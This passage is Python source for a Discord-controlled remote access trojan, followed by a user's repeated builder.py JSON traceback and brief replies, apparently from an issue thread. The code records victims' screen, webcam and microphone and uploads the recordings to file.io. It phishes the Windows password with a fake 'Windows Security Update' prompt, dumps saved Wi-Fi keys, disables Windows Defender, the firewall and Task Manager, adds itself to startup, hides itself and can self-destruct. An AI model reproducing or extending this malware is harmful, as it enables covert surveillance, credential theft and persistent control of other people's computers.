await message.channel.send("output is : " + output)
if message.content == "!listprocess":
import os
import subprocess
if 1==1:
result = subprocess.getoutput("tasklist")
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output.txt"):
os.system(r"del %temp%\output.txt /f")
f1 = open(temp + r"\output.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content.startswith("!prockill"):
import os
proc = message.content[10:]
kilproc = r"taskkill /IM" + ' "' + proc + '" ' + r"/f"
import time
import os
import subprocess
os.system(kilproc)
import subprocess
time.sleep(2)
process_name = proc
call = 'TASKLIST', '/FI', 'imagename eq %s' % process_name
output = subprocess.check_output(call).decode()
last_line = output.strip().split('\r\n')[-1]
done = (last_line.lower().startswith(process_name.lower()))
if done == False:
await message.channel.send("[*] Command successfuly executed")
elif done == True:
await message.channel.send('[*] Command did not exucute properly')
if message.content.startswith("!recscreen"):
import cv2
import numpy as np
import pyautogui
reclenth = float(message.content[10:])
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
if input3 >= reclenth:
break
else:
continue
import os
SCREEN_SIZE = (1920, 1080)
fourcc = cv2.VideoWriter_fourcc(*"XVID")
temp = (os.getenv('TEMP'))
videeoo = temp + r"\output.avi"
out = cv2.VideoWriter(videeoo, fourcc, 20.0, (SCREEN_SIZE))
counter = 1
while True:
counter = counter + 1
img = pyautogui.screenshot()
frame = np.array(img)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out.write(frame)
if counter >= input2:
break
out.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.avi"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.avi /f")
else:
file = discord.File(check, filename="output.avi")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.avi /f")
if message.content.startswith("!reccam"):
import cv2
import numpy as np
import pyautogui
input1 = float(message.content[8:])
import cv2
import os
temp = (os.getenv('TEMP'))
vid_capture = cv2.VideoCapture(0)
vid_cod = cv2.VideoWriter_fourcc(*'XVID')
loco = temp + r"\output.mp4"
output = cv2.VideoWriter(loco, vid_cod, 20.0, (640,480))
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
ret,frame = vid_capture.read()
output.write(frame)
if input3 >= input1:
break
else:
continue
vid_capture.release()
output.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.mp4"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.mp4 /f")
else:
file = discord.File(check, filename="output.mp4")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.mp4 /f")
if message.content.startswith("!recaudio"):
import cv2
import numpy as np
import pyautogui
import os
import sounddevice as sd
from scipy.io.wavfile import write
seconds = float(message.content[10:])
temp = (os.getenv('TEMP'))
fs = 44100
laco = temp + r"\output.wav"
myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)
sd.wait()
write(laco, fs, myrecording)
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.wav"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.wav /f")
else:
file = discord.File(check, filename="output.wav")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.wav /f")
if message.content.startswith("!delete"):
global statue
import time
import subprocess
import os
instruction = message.content[8:]
instruction = "del " + '"' + instruction + '"' + " /F"
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
global statue
statue = "ok"
if statue:
numb = len(result)
if numb > 0:
await message.channel.send("[*] an error has occurred")
else:
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
statue = None
if message.content == "!disableantivirus":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import subprocess
instruction = """ REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" | findstr /I /C:"CurrentBuildnumber" """
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
done = result.split()
boom = done[2:]
if boom <= ['17763']:
os.system(r"Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet")
await message.channel.send("[*] Command successfuly executed")
elif boom >= ['18362']:
os.system(r"""powershell Add-MpPreference -ExclusionPath "C:\\" """)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] An unknown error has occurred")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!disablefirewall":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
os.system(r"NetSh Advfirewall set allprofiles state off")
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content.startswith("!audio"):
import os
temp = (os.getenv("TEMP"))
temp = temp + r"\audiofile.wav"
if os.path.isfile(temp):
delelelee = "del " + temp + r" /f"
os.system(delelelee)
temp1 = (os.getenv("TEMP"))
temp1 = temp1 + r"\sounds.vbs"
if os.path.isfile(temp1):
delelee = "del " + temp1 + r" /f"
os.system(delelee)
await message.attachments[0].save(temp)
temp2 = (os.getenv("TEMP"))
f5 = open(temp2 + r"\sounds.vbs", 'a')
result = """ Dim oPlayer: Set oPlayer = CreateObject("WMPlayer.OCX"): oPlayer.URL = """ + '"' + temp + '"' """: oPlayer.controls.play: While oPlayer.playState <> 1 WScript.Sleep 100: Wend: oPlayer.close """
f5.write(result)
f5.close()
os.system(r"start %temp%\sounds.vbs")
await message.channel.send("[*] Command successfuly executed")
#if adding startup n stuff this needs to be edited to that
if message.content == "!selfdestruct": #prob beter way to do dis
import inspect
import os
import sys
import inspect
uncritproc()
cmd2 = inspect.getframeinfo(inspect.currentframe()).filename
hello = os.getpid()
bat = """@echo off""" + " & " + "taskkill" + r" /F /PID " + str(hello) + " &" + " del " + '"' + cmd2 + '"' + r" /F" + " & " + r"""start /b "" cmd /c del "%~f0"& taskkill /IM cmd.exe /F &exit /b"""
temp = (os.getenv("TEMP"))
temp5 = temp + r"\delete.bat"
if os.path.isfile(temp5):
delelee = "del " + temp5 + r" /f"
os.system(delelee)
f5 = open(temp + r"\delete.bat", 'a')
f5.write(bat)
f5.close()
os.system(r"start /min %temp%\delete.bat")
if message.content == "!windowspass":
import sys
import subprocess
import os
cmd82 = "$cred=$host.ui.promptforcredential('Windows Security Update','',[Environment]::UserName,[Environment]::UserDomainName);"
cmd92 = 'echo $cred.getnetworkcredential().password;'
full_cmd = 'Powershell "{} {}"'.format(cmd82,cmd92)
instruction = full_cmd
def shell():
output = subprocess.run(full_cmd, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("password user typed in is: " + result)
if message.content == "!displayoff":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
WM_SYSCOMMAND = 274
HWND_BROADCAST = 65535
SC_MONITORPOWER = 61808
ctypes.windll.user32.BlockInput(True)
ctypes.windll.user32.SendMessageW(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, 2)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!displayon":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
from pynput.keyboard import Key, Controller
keyboard = Controller()
keyboard.press(Key.esc)
keyboard.release(Key.esc)
keyboard.press(Key.esc)
keyboard.release(Key.esc)
ctypes.windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!hide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system("""attrib +h "{}" """.format(cmd237))
await message.channel.send("[*] Command successfuly executed")
if message.content == "!unhide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system("""attrib -h "{}" """.format(cmd237))
await message.channel.send("[*] Command successfuly executed")
#broken. might fix if someone want me too.
if message.content == "!ejectcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door open', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!retractcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door closed', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!critproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
critproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content == "!uncritproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
uncritproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content.startswith("!website"):
import subprocess
website = message.content[9:]
def OpenBrowser(URL):
if not URL.startswith('http'):
URL = 'http://' + URL
subprocess.call('start ' + URL, shell=True)
OpenBrowser(website)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!distaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statuuusss
import time
statuuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statuuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
import winreg as reg
reg.CreateKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
else:
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!enbtaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statusuusss
import time
statusuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statusuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
await message.channel.send("[*] Command successfuly executed")
else:
import winreg as reg
reg.DeleteKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!getwifipass":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import os
import subprocess
import json
x = subprocess.run("NETSH WLAN SHOW PROFILE", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
x = x[x.find("User profiles\r\n-------------\r\n")+len("User profiles\r\n-------------\r\n"):len(x)].replace('\r\n\r\n"',"").replace('All User Profile', r'"All User Profile"')[4:]
lst = []
done = []
for i in x.splitlines():
i = i.replace('"All User Profile" : ',"")
b = -1
while True:
b = b + 1
if i.startswith(" "):
i = i[1:]
if b >= len(i):
break
lst.append(i)
lst.remove('')
for e in lst:
output = subprocess.run('NETSH WLAN SHOW PROFILE "' + e + '" KEY=CLEAR ', stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
for i in output.splitlines():
if i.find("Key Content") != -1:
ok = i[4:].replace("Key Content : ","")
break
almoast = '"' + e + '"' + ":" + '"' + ok + '"'
done.append(almoast)
await message.channel.send("[*] Command successfuly executed")
await message.channel.send(done)
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!startup":
import ctypes
import os
import sys
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
path = sys.argv[0]
isexe=False
if (sys.argv[0].endswith("exe")):
isexe=True
if isexe:
os.system(fr'copy "{path}" "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /Y' )
else:
os.system(r'copy "{}" "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" /Y'.format(path))
e = r"""
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "cmd /c cd C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ && python {}", 0, True
""".format(os.path.basename(sys.argv[0]))
with open(r"C:\Users\{}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.vbs".format(os.getenv("USERNAME")), "w") as f:
f.write(e)
f.close()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
client.run(token) ` main
i believe there is no errors in main.py
Traceback (most recent call last): File "builder.py", line 142, in <module> fetch(list) File "builder.py", line 77, in fetch data = json.load(file) File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\__init__.py", line 293, in load return loads(fp.read(), File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\__init__.py", line 357, in loads return _default_decoder.decode(s) File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\decoder.py", line 337, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\decoder.py", line 353, in raw_decode obj, end = self.scan_once(s, idx) json.decoder.JSONDecodeError: Expecting property name enclosed in double quotes: line 5 column 5 (char 140)
Are you getting this error when you used fetch command?
Traceback (most recent call last): File "builder.py", line 142, in <module> fetch(list) File "builder.py", line 77, in fetch data = json.load(file) File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\__init__.py", line 293, in load return loads(fp.read(), File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\__init__.py", line 357, in loads return _default_decoder.decode(s) File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\decoder.py", line 337, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\decoder.py", line 353, in raw_decode obj, end = self.scan_once(s, idx) json.decoder.JSONDecodeError: Expecting property name enclosed in double quotes: line 5 column 5 (char 140)
Btw is this modified version?
Traceback (most recent call last): File "builder.py", line 142, in <module> fetch(list) File "builder.py", line 77, in fetch data = json.load(file) File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\__init__.py", line 293, in load return loads(fp.read(), File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\__init__.py", line 357, in loads return _default_decoder.decode(s) File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\decoder.py", line 337, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) File "C:\Users\scripto\Desktop\testing\python3.8.9\lib\json\decoder.py", line 353, in raw_decode obj, end = self.scan_once(s, idx) json.decoder.JSONDecodeError: Expecting property name enclosed in double quotes: line 5 column 5 (char 140)